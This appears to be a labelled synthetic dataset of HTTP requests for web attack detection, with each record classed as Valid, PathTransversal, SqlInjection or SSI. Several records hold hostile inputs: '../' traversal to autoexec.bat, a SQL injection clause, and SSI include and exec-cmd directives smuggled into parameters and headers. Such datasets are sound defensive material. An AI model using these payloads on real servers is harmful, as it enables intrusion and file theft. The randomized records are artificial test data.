Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: Oueba TSkes=e8Hse
Range: 127-
Referer: /RoUbex/kcditod.php3
TE: trailers
Trailer: Proxy-Authorization
User-Agent: sbeoie9a/7.2
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 352x5203
Via: 3.9 83.187.45.116, 8.5 29.210.99.189
Transfer-Encoding: rqscb; cew4ylwR=tNLrjviu
Upgrade: dmd/4.2, Tdhwx9/6.6
Warning: 317 www.kcoono.tiff "csd2erdpoarTetors" 
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24364
Start - Id: 1398
class: Valid
GET /h_m/trAlEatra/h9_eJs@j-hp3Gn/s9oewm4ned/p0ehAe8oomamqyo/TcmailY7VXG0PPI92R/tmoallCevmEen/jEibowepemma6.jsp?3rcAtbct=ge%3Ehutranode15strr&GHu_Oiframe79-4=li%3F&ta68E=a&Tss=%40htaccesleq4%24FRlv3+&qyugonhmh3=r3UheWcTBQ9&r6gcAohgi=07735&nlAas3gr9ei=hx5jiwf1rd1&iitnotitsme=388799&wdmoWCtmp=%5Ccmd2telnety&aiuhnot=60&nejApo25i8nhhq=aySne7tn8&spejhh2ysm=nJ.v6n&fhRdeli91s=+u&daea6mea1ot=denIfn10eeoepd&rspee2pesx9=sb HTTP/1.1
Host: www.kMud5b.net:8
Connection: 18lewd
Accept: video/quicktime, application/zip;q=0.2
Accept-Charset: euc-jp;q=0.1, x-mac-korean;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 134.116.95.103
Cookie: 5eNi=ihttpsC;nrexpa=58843902;eidrsAyo=550245;ir=rehtjgQ0ebm;GiTcq8egs84eni=9361556884
Cookie2: $Version="08"
Date: Sun, 04 Jun 06 09:50:51 GMT
ETag: W/"EzbiYuN8PW38Neaol2"
Expect: sAhilet=ojifI;aEeoeots
From: etIb71s@I2gK.it
If-Modified-Since: Fri, 01 Jun 07 03:33:20 UTC
If-Unmodified-Since: Mon, 26 Dec 05 11:14:50 CET
If-Match: *
If-None-Match: "RjCgyPyjY7OnFOZ"
If-Range: *
Max-Forwards: 7
MIME-Version: 7.3
Pragma: d=ssnIeqb
Proxy-Authorization: aibtn 4neurc=oeOocv8e
Authorization: Digest nonce
Range: 211-065352
Referer: /yAtz.mdb
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: ctoctheeqeieutt
UA-CPU: PowerPC
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 238x900
Via: 1.0 43.99.238.176, 5.3 98.249.240.105
Transfer-Encoding: compress
Upgrade: bhgp/1.7
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 166.217.103.151
X-Serial-Number: 8811258803232
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1398
Start - Id: 44717
class: PathTransversal
POST /ptmeoshoh/pQqT0P/uf5/tgI@ljH/bwd/arwgt7pEhagekepS/unplsK8nsHG/t@0Oy06mPbImIuD3bA/e@UFj0G_R6xAkao/mnVuOFofvO-G/nOm2u.htm? HTTP/1.1
Content-Length: 115
Content-Language: n
Content-Encoding: gzip
Content-Location: http://www.rrOms.st/rhiica/toe6oo/emthEAne.php3
Content-MD5: cmJubGx0c3NhbW9mZWVabg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Mar 07 01:51:39 GMT
Last-Modified: Thu, 17 Aug 06 06:16:08 UTC
Host: 195.99.69.91
Connection: close
Accept: text/html;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: uaoc-m;q=0.0, eaooas-lckdmhro
Cache-Control: min-fresh=5011
Client-ip: 230.63.102.101
Cookie: ss7e=H(iitsoc2l;ajByyiuwlww2sqI=34990;4scriptGL4=69-Mw9BWgy;eSb=6unaETsists;euosepotEntCkes=eid9n;nglta9t9ws=%]o
Cookie2: $Version="777"
Date: Sat, 26 Mar 05 24:27:22 UTC
ETag: W/"iZhuf9TR391qS9y6Uib"
Expect: iLhe
From: ntofsxe@nilrhaih6.gov
If-Modified-Since: Thu, 08 Jan 09 05:44:29 GMT
If-Unmodified-Since: Sun, 07 May 06 10:00:40 CET
If-Match: *
If-None-Match: "ucjM3TZymFySr8hhU"
If-Range: Sat, 23 Feb 08 14:11:33 UTC
Max-Forwards: 66
MIME-Version: 0.7
Pragma: naqRi='ji'
Proxy-Authorization: o7lshm rootirq=tt9s
Authorization: NTLM c3VudHl0VWFxaWN0cW9uZWVlbXB1ZHJyZWN0TjVkM2F0ZjVzYWFtcmhyZW5RZQ==
Range: 8542-,-709
Referer: /nhld.gif
TE: chunked,gzip
Trailer: Proxy-Authorization
User-Agent: h-ZNq. http://www.sing.uk
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 491x774
Via: 2.0 www.lwretn1.jpeg, nfrR/2.0 www.rseer.html:02809, 0.5 62.95.39.95:45
Transfer-Encoding: ttmwo; whnei=IauLn8
Upgrade: hcWX/1.9, Lttry/9.2, exAer/3.6, rnt/7.8
Warning: 427 207.57.123.57 "prsEe79slxhsh" "Thu, 19 Jul 07 03:06:44 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

woootI=214&aterr=4bie1h2dgunlp&5dt=jraccess_logr2bniqt&nodeJL20L0=file:///o:/ywaot/et6e8/misoxt.xml

End - Id: 44717
Start - Id: 35190
class: SqlInjection
GET /DMu/cning8kuyruhhgimo/YLpgDDP2AXZ./3IQ8MRBN-KW2bUgCAFk/xoEaAvbytdt/f9shsmm1neDnnioci/epKv.lCwKSdlXRl-Bcl/tJwTDnedbU.V4z@8eKF/ee9mtamxirhsom0se/jfi/7QmTSz4LVoCzJCjrzBRL/eueoe5hGtDrt.html?x9aeltn=81432514&eo=OR+++++%275net%27+BETWEEN+++%27R%27+++AND+++%27T%27&nregluer=otakDeo&5kipo3mnItzlT=4293946&7staepifn=dcEMi8&9A3=ejdvx&1rpcegidww=obm1reyrxe HTTP/1.0
Host: 118.92.174.168
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Wed, 19 Jan 05 21:08:33 CET
ETag: "Q7ymttM9lu3GrvwrJmu."
Expect: twhn
From: ei5rasmn@Is8otu4t.com
If-Modified-Since: Wed, 23 Sep 09 24:31:30 UTC
If-Unmodified-Since: Mon, 26 Feb 07 16:35:55 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 183
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Et9m nEu55lo=aeeeo
Range: 7416-9436,-80
Referer: /lz0msh/sr8rO0.tar.gz
TE: trailers,deflate
Trailer: Referer
User-Agent: Mozilla/6.3 (X11; U; Open BSD i586 1.1; u3-ar; rv:3.8.5) Gecko/88007658
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
UA-Pixels: 0990x1742
Via: OiraAi/7.4 108.17.167.77, 3.4 www.nSbvldn.js
Transfer-Encoding: identity
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35190
Start - Id: 36024
class: PathTransversal
GET /mRoay/besqtxtUrcras3d2eb/cAyOsk9e9dchaorgc/d2ah/iTxBwNymnxZ@Nv.php4?bocsnmoogen=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&hJormojhl=eHBTnKkBx HTTP/1.1
Host: 119.184.242.130
Connection: p6tRnepw
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip, deflate, deflate;q=0.2, deflate
Accept-Language: st6ynhH-Ioe;q=0.1, blscN8n-nb;q=0.1, 73attsin-lsaTsfI;q=0.5
Cache-Control: no-store
Client-ip: 55.18.97.213
Cookie: Ed2ses=142;t8Ovtt1enenaat=wtSohd;ls9daovesatcMAe=en i;dneesiei067=tQbm
Cookie2: $Version="5"
Date: Sat, 07 May 05 09:55:53 UTC
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: e1ea@teeopdrn.uk
If-Modified-Since: Fri, 24 Oct 08 06:46:06 CET
If-Unmodified-Since: Wed, 03 Aug 05 16:08:54 GMT
If-Match: "QEWE1zMct_uw8sRd"
If-None-Match: *
If-Range: "VXH3euDX1VSxUnsYb"
Max-Forwards: 22
MIME-Version: 2.1
Pragma: yr=en2n
Proxy-Authorization: NTLM bmFiRXRsbmlnZXplYWxzTml1bWVlYWVyYWFzdHNkZDh4YTE0bmo=
Authorization: Digest opaque="ek3w"
Range: -05066,-92,-024075
Referer: http://www.rxxei5.fr/6eh0Ehr/ejmAeskn/1sifNi.php4
TE: chunked;q=0.5
Trailer: User-Agent
User-Agent: xxt7pii (7NGedbA@; shfVBOv; p10og2dQny; e73wim)
UA-Disp: 097,2396,8
UA-OS: Win98
UA-Color: color8
Via: FTP/9.2 www.jceHisw.css, FTP/3.6 254.83.113.103:50010
Transfer-Encoding: eeef
Upgrade: vki/8.2, ltp2/4.4, eeft/1.6
Warning: 366 209.231.92.237 "1njhsgaZmEo" "Fri, 29 Feb 08 20:21:14 CET"
X-Serial-Number: 83480
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36024
Start - Id: 26884
class: Valid
GET /bjaK/aqQR7oJX0unir4bps/osamcti/q0lj_z3.php3?8ottya5edEcaecH=24426&ddsl=oesodyNpassthru&pDU=eosyi&eail6hea=nret&tAtar4nS=t HTTP/1.1
Host: 51.132.180.191:80
Connection: close
Accept: application/x-tar, audio/*;q=0.1, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: v0-ev;q=0.2, ushnPd-f2Koa;q=0.3
Cache-Control: min-fresh=7272
Client-ip: 42.185.253.58
Cookie: ocoert0Ide=wgete7;reH=eqVN;elT5Suetrg1=oW5
Cookie2: $Version="22"
Date: Fri, 16 Feb 07 06:22:27 GMT
ETag: "IAtnXv67SoAZSEy5b_z"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Thu, 23 Jun 05 21:41:33 GMT
If-Unmodified-Since: Tue, 03 Jul 07 17:48:21 CET
If-Match: *
If-None-Match: "z0MP6@uiocQ9Lj.gE"
If-Range: Tue, 26 Jan 10 22:30:22 UTC
Max-Forwards: 61
MIME-Version: 9.3
Pragma: oplloU='qinXhwux'
Proxy-Authorization: Basic YWlhZ2ZBcjo1bXJldQ==
Authorization: Digest realm
Range: 70837-,02-
Referer: http://www.atipn063.it/as7to.php4
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: his8gl
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0290x1154
Via: 8.9 www.Ne3zyc.shtml, nas/7.8 www.imnf8.jpeg
Transfer-Encoding: gzip
Upgrade: mhdhoc/5.7, iii/0.3, OdSnsv/0.4, egRm/2.5
Warning: 297 www.mw6loneh.png "otAjosweset" 
X-Forwarded-For: 35.173.18.194
X-Serial-Number: 62154
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26884
Start - Id: 20268
class: Valid
GET /dcFMp@.asp? HTTP/1.0
Host: 120.236.72.24
Connection: close
Accept: */*;q=0.2
Accept-Charset: macintosh;q=0.2, x-mac-turkish, euc-jp;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: mu6esfe-2a;q=0.3, Gbhsy-ee5zieua;q=0.3, 09yhNr-EErgl55;q=0.7
Cache-Control: only-if-cached
Client-ip: 66.96.116.160
Cookie: azpoc=hPCv;G--CphPrPV8=42;jre2imh4rjei= y2a0nrdw;IUo_rZ=ef8cxK;olair4hht=f
Cookie2: $Version="389"
Date: Sat, 25 Mar 06 10:23:06 GMT
ETag: "GRSd.RAB2xqYJdR"
Expect: eata
From: ptdetu@lTemn.cz
If-Modified-Since: Sun, 06 Jul 08 10:32:56 GMT
If-Unmodified-Since: Fri, 25 Jun 04 17:55:49 CET
If-Match: "cF.nRbAfVdaIirbf9kFK"
If-None-Match: "favZNyTBDDwc@mabb"
If-Range: Wed, 28 Apr 04 13:10:22 GMT
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: Digest nc=7Caf5DaF
Range: 2-254176
Referer: /htees/gIsnqn/ttevmgc/o3rtutjs/to1i8t.pdf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: 1t06XVFGl http://www.99eedsi.be
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: N1rri/2.2 www.nke7e.jpg, HTTP/7.2 www.otP4.tiff:0843, sNc/0.1 www.aq5nle.gif
Transfer-Encoding: identity
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 33.165.104.226
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20268
Start - Id: 12266
class: Valid
GET /rNbf@-H3nI-2WlGE/t4TLc.EiYM5/iF_lt1qqLPR6-px72W/wbM6/mheenq/waFZTfZH6g5/pu0hsmeeeoafiMesr/ZvT/dleshifh1/ay3QuOT-ruhn03yNhiwd/v7tkOe/ittruPoysikqnteazo.tiff?gbrbhfd=60262472&Eiik=01675&lshtht7=539&YI=6ai1cnarct%5Cu HTTP/1.0
Host: 74.91.176.155:80
Connection: rrosfe
Accept: */*
Accept-Charset: gb2312;q=0.5, cp-950, x-mac-arabic, x-mac-chinesetrad;q=0.4, koi8
Accept-Encoding: gzip, gzip;q=0.3, identity, identity, identity;q=0.7
Accept-Language: ls4ndnf-a;q=0.8, httCsd-sn4deCjv, rveo6u-Xs;q=0.3
Cache-Control: s0os=eq
Client-ip: 170.207.96.98
Cookie: ri5noty9t=?sn9l;nhwfenqa=3Ee""iotcca9lLttunionu[;doreohteefi=f h
Cookie2: $Version="853"
Date: Sun, 08 Jul 07 03:27:41 GMT
ETag: W/"zbAZ10Y6tqKnLDk8"
Expect: 100-continue
From: ihu03@addugo.com
If-Modified-Since: Mon, 18 Aug 08 14:35:41 GMT
If-Unmodified-Since: Wed, 21 Apr 04 16:25:40 UTC
If-Match: "ryrsy0VxIaVQ375KMP8"
If-None-Match: "-vmpPh0huM1IbVv00R."
If-Range: *
Max-Forwards: 3
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest qop=gqmIiltu
Authorization: sov0 isUym4=eOnj
Range: 9688-4015,-4,45-
Referer: http://Izrz.de/daiRAf1t/ai09nutF/dnhitnae/iesl/nxvia.nsf
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: Mozilla/2.6 (compatible; Konqueror/0.0; WinNT; ei5nwhqan; IedcwJIcat; idttnss)
UA-CPU: x86
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7901x792
Via: 0.8 www.yHAyrtd.html, a6nj/2.9 90.219.57.205, FTP/4.6 www.i8ag.htm
Transfer-Encoding: gtnnoT; R9msal7i=Ssy2u1ls
Upgrade: llr/1.5, sS4lb9/2.2, sr7wD/6.1, so4i/0.5
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12266
Start - Id: 17192
class: Valid
GET /lnLQXJwqrRBQp/tlCu6/7z@XsBxZ6P4_gOjdQY/rte/A5ERpwp-@Am/riionir.js?htoaaetceh2StEu=oUqUPQNz&trssRd=ml9%3Dt&3fahce5M3f=95761&hcaw=dhsa71nI16ptde HTTP/1.1
Host: 75.146.80.230
Connection: r6etntrn
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3-ssfs
Cache-Control: no-store
Client-ip: 28.148.70.34
Cookie: c1UInss=&naUcigroup byahddsne
Cookie2: $Version="969"
Date: Mon, 25 Oct 04 07:46:57 GMT
ETag: "DpH5W-M9lCZJM_FYPvV"
Expect: httseaef
From: coitcHa@l0mro06.gov
If-Modified-Since: Sat, 09 Apr 05 18:13:05 CET
If-Unmodified-Since: Sun, 09 Jan 05 18:46:29 UTC
If-Match: "yQ8ogSdbQfha37R"
If-None-Match: "pphvkDAR2vAOhgY"
If-Range: Sat, 09 May 09 10:53:03 GMT
Max-Forwards: 6352
MIME-Version: 8.9
Pragma: OlsI=x
Proxy-Authorization: vntdib eYlwr465=aelnx
Authorization: 2t06n rkLnehme=7ilOc
Range: -2,97-07848
Referer: http://2tls.gov/puffa/hkaee/hriesw/useh/n2ki.sh
TE: trailers
Trailer: Max-Forwards
User-Agent: dasttaik (fp.BgdmKs; 1EtWl7w.f; gFwmuZ)
UA-CPU: Sparc
UA-Disp: 150,488,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 987x645
Via: HTTP/8.3 www.eorieeh.gif, HTTP/7.1 www.o9wedauh.css
Transfer-Encoding: identity
Upgrade: Rtse4/4.8, sws/4.3, Oel/3.3, codm/2.9
Warning: 157 210.149.40.146 "eatrVldswa" "Sun, 23 Jan 05 12:01:52 UTC"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17192
Start - Id: 35923
class: PathTransversal
GET /a75u/dotrgo84t/sUks6Ejsg/r.oFlP3cu6.tiff?omrrEo=%29csx0+R%2Fls%27l%5Ct&hoidj=wVdB&_IRt=epot&a6esTir=8&luoeeahgtexe9wh=Sllib3thxmlei&MvM5HYbin=4&eeNi2ne=beskz HTTP/1.1
Host: 117.121.185.96
Connection: asaakq9a
Accept: application/*, audio/x-wav, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: hORuilh-as, oq2s2ehm-Rwsmhe;q=0.6, c-smr;q=0.9, ejhh-oc;q=0.1, nwrodea-y;q=0.9
Client-ip: 55.157.127.32
Date: Mon, 02 Oct 06 14:06:11 GMT
ETag: "KuZ@SB596Hf38RrsfJBt"
If-Modified-Since: Sat, 02 Oct 04 05:32:02 GMT
If-Unmodified-Since: Tue, 27 Jun 06 10:14:15 UTC
If-Range: "1wmutHmGwiHt-mn"
Max-Forwards: 9352
Referer: http://sreay.org/dleokas/ttnphTaS.js
User-Agent: <!--    #include virtual="/var/log/httpd/access.log"     -->
X-Forwarded-For: 226.192.88.102

null

End - Id: 35923
Start - Id: 9832
class: Valid
GET /ih4tts9Uppr/OI8APtdnWn4Tr/FexecE@D1/kr2tt0Doaqeuxw/dnDdeckIxyeeO28u/aowdetTreh/nacae13C.jpeg?98jeLr=655&dsiwjen01etshm=toeupdateho&stLierthea9mate=tsock_streamf&Ha0jJ=72x8o7i%40oN2i&vTcedipgwii=elS3flietakditt&vv3hguivrnl=zfgadmintAgtscro&np9no=977 HTTP/1.1
Host: 158.5.88.39
Connection: dnt9a
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 222.11.155.180
Cookie: repedt4aatrsen=75004
Cookie2: $Version="34"
Date: Wed, 24 Mar 10 01:32:48 UTC
ETag: W/"ZMRzs0iK6Zj4K1_Nt_TE"
Expect: 100-continue
From: ihedktc@senO.gov
If-Modified-Since: Mon, 24 Apr 06 04:13:18 UTC
If-Unmodified-Since: Fri, 13 Feb 04 10:55:18 UTC
If-Match: "3gDjk.eWvOuUShZE25"
If-None-Match: "_R0vwl1HYGc2WsMH"
If-Range: "95ba-o81k6ivLtOALPv"
Max-Forwards: 94
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM ZW5IcGhzZWRYZWFvaWV3ZHNleUVNMGF5V3Rsc28ydGl1cWFXejI3ZGN1WXFh
Authorization: Basic YWd0cHE6b3lvbm50
Range: 1142-61392
Referer: http://yrh1k.it/ditferdm/oied/iyeyehl/2hiwewa.zip
TE: trailers,gzip;q=0.3
Trailer: Via
User-Agent: kymjcvjmoi/5.3
UA-CPU: x86
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3832x6503
Via: oyns/5.9 www.frshCbi.shtml
Transfer-Encoding: gzip
Upgrade: eedP/1.4, o2setj/8.6
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 59.15.240.43
X-Serial-Number: 09946739061718
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9832
Start - Id: 46012
class: PathTransversal
PUT /yel121ese/eb./eeR2epEncuycibp6e/ygttcf/iUUOwVtdpFHZbpUD@.tiff? HTTP/1.1
Content-Length: 221
Content-Language: heob,auefhta
Content-Encoding: identity
Content-Location: http://pirttle.be/efehG/t8us.jsp
Content-MD5: bmh3b2VvZWtzbmhweWdlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Nov 07 13:04:59 GMT
Last-Modified: Sat, 19 Apr 08 23:48:02 CET
Host: www.iwNutLrfd3.be
Connection: close
Accept: application/*;q=0.8, video/mpeg
Accept-Charset: cp-950;q=0.6, euc-cn, gb2312;q=0.1, windows-1255, macintosh
Accept-Encoding: identity;q=0.9
Accept-Language: 2SeduY-p, uEfa-nhs, tsaqr-rrSaRtr, 7-8rdu;q=0.8, dere-Na;q=0.6
Cache-Control: fsotglA=riErard
Client-ip: 17.228.75.155
Cookie: IJKZfgroup bytelnetd9=etvwmeLyjonla;m1asiihh2d4he=\autoexec.bat
Cookie2: $Version="5"
Date: Mon, 02 Jan 06 08:03:09 CET
ETag: "eO1Ccbc.Nt5b9d2EP3tV"
Expect: nqzigr6
From: S8Hq@esnd8.st
If-Modified-Since: Fri, 08 Jan 10 24:06:41 UTC
If-Unmodified-Since: Mon, 19 Nov 07 23:23:55 UTC
If-Match: *
If-None-Match: "MVAT2N._aMC0UJZYT@"
If-Range: Fri, 18 Jun 04 24:44:59 UTC
Max-Forwards: 8338
MIME-Version: 8.1
Proxy-Authorization: NTLM aWllclB0eGFxaWJjbnllbHR0ZTdlNjVkM2VlaTNzdHR1dHRp
Authorization: Digest realm
Referer: http://wxaotE.org/gssdrwrr/XedO9c.mp3
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: vmdrED
UA-Disp: 513,988,16
Via: HTTP/3.3 206.40.141.236, 7.0 www.q8aenZ.jpeg
Transfer-Encoding: roxli; nnstieqx=iptbte
X-Forwarded-For: 150.199.183.225
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xsb=u llve&ogylmunPon=2442836307&hle=l  yrAieoen&TNcuB=e&vetT=]eOfaccept)tdd:t&ae=42hXEAvebrKC&E-formtEAM=d4j&eyifc=ydroppa&1where5Jfw8Spba=a]yie)Linandaccept(ua&lttntseIeleNon=hisuekuteiR riv&oaAlwinavbtory=8

End - Id: 46012
Start - Id: 40261
class: SSI
GET /nq/stRrT7.CwLCOMn/lErNmRox7a4x8nemhale/npeiaphejosanba2Ylut/whor5w5Eie74.gif?uei=%2Be7khLt6&r6nsumen=apt1i3ncat+cmdYtTe&ytn804eo=%3C%21--%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5CsgDrc1ab%5C4ayst2a%5Cdwbnia.exe+++++d%3A%5CasSioa%5Cwww.atta.org%5CdTio%5Cdatabase.mdb++%2Fx+++exporttofoxpro%22--%3E&s6aHetj6arNs=re5&ormabnmtFtPa=6391302 HTTP/1.1
Host: www.hrrt7i.com:80
Connection: t3rne
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 179.110.46.44
Date: Sat, 16 Jun 07 22:59:13 GMT
Expect: 100-continue
From: 7Aiet@9het.it
If-Match: "FJ.9_fr6SW2.zQic6K19"
If-None-Match: "al9Ci8aqrUkjFeBH"
Max-Forwards: 253
Authorization: Basic Z1RvaWRtczY6b3NsZQ==
Referer: /sfixl/sl7z4/cxa8/hgees/h4s1tlnh.nsf
User-Agent: itrsadcas/6.7.9.7.4
UA-CPU: MIPS
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40261
Start - Id: 15202
class: Valid
GET /r1mrlwec/amlL/oxnv/oiGh.62/m@fxYv6PCYO9JaTlQcj/4sd3VQi@g8/bsdm3mrUFX4p1Bqo-9/q9R3aT5@Kl/LsefecuttLth/su0rhis/FRa5oMxTwget0Ek/Orhf3sdtDaesp.exe? HTTP/1.1
Host: www.wyeeaw.com
Connection: close
Accept: image/*;q=0.9, text/*;q=0.6, text/*
Accept-Charset: iso-8859-7, gb2312;q=0.9, utf-8, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 49.90.43.231
Cookie: 3zZNncdUt=a 88=;eipfti=94131942;w5pwl==h$;0s=hetwt;reuisEilsrS=pisdhboot.inipea=n]lIeR;dct97gTomaupee=c@Ai
Cookie2: $Version="700"
Date: Sun, 03 Feb 08 11:15:49 UTC
ETag: W/"1CooHu3lz-769rZ8r"
Expect: 100-continue
From: ahtrq5j@fhrnWs.it
If-Modified-Since: Tue, 04 May 04 23:40:06 UTC
If-Unmodified-Since: Tue, 21 Sep 04 09:57:39 UTC
If-Match: "KeqJ0Y@07cdu-i5hbs"
If-None-Match: "T9QuZqQJlcoaDP_02g"
If-Range: Tue, 26 Jul 05 09:36:42 UTC
Max-Forwards: 859
MIME-Version: 1.4
Pragma: isiteh=Md
Proxy-Authorization: Digest realm
Authorization: 2oKd dti7nal=t6ihpnaA
Range: 478892-,53727-
Referer: http://yrofdyo.ch/tneea/hllasovb/ygoO.msf
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.2 (X11; U; Open BSD i586 7.3; ig-3e; rv:0.9.9) Gecko/15502604
UA-CPU: Sparc
UA-Disp: 450,4767,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: FTP/4.7 2.152.202.88:154, 4.6 www.pdehCda2.htm
Transfer-Encoding: compress
Upgrade: bcdD/5.6, SOfeT/0.6, d9O/4.6
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 01906983974999
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15202
Start - Id: 21197
class: Valid
GET /rYUUDvp/pgw7t/JCtGtAQMoO/tnicsal/AehsieyutoogRymntar.jpg?sAitt=6koorse+62%3Aawsrbc&sywql=olsws&access_log@ESE=tYBjxkK&oelttt=ilnoint%25u&yaae5sdlyn5iki=+6&eornvoj=%28ooscext0Eea9T%2B%3A%7Cr&htmdme1pbontd1s=wcmhEIW2z1DD&nnesr=2417956196&hcrmhs=em%3ETrsw%7Cel&seomsnbjeU9eoa=enosjr HTTP/1.0
Host: www.seEt9rri.org:80
Connection: ceir
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-age=4
Client-ip: 201.72.152.249
Cookie: RTSsock_streamShttpuXbM=tAhdeoslahb;LdEPK=50029;B_kchildrstmpEq2=@7Ii;neIzr=t6u:ss7;MroptcbsamfThvUG=neotSge|Hdeeo;SdeleteRAUtX=regLa1S9BBnj
Cookie2: $Version="1"
Date: Wed, 09 Feb 05 18:42:30 GMT
ETag: "XSsbP1GsdwUH1Vx"
Expect: talwbg
From: iiteLaco@s0ovono0.de
If-Modified-Since: Sat, 29 Nov 08 15:49:19 UTC
If-Unmodified-Since: Wed, 14 Apr 04 10:06:16 UTC
If-Match: "HcG7zKG7Zmtz6M9"
If-None-Match: *
If-Range: Wed, 16 Nov 05 20:34:31 UTC
Max-Forwards: 376
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YWFpaHlkb246dGhldGRsdA==
Range: -62
Referer: /aoIq9os/opeh2m/tEa3nifa.tiff
TE: trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 0.9; dj-ie; rv:0.0.8) Gecko/75281138
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: 4.7 www.fhn9n.png, 3.5 89.37.156.78
Transfer-Encoding: compress
Upgrade: paa/5.3, a9Au/8.0
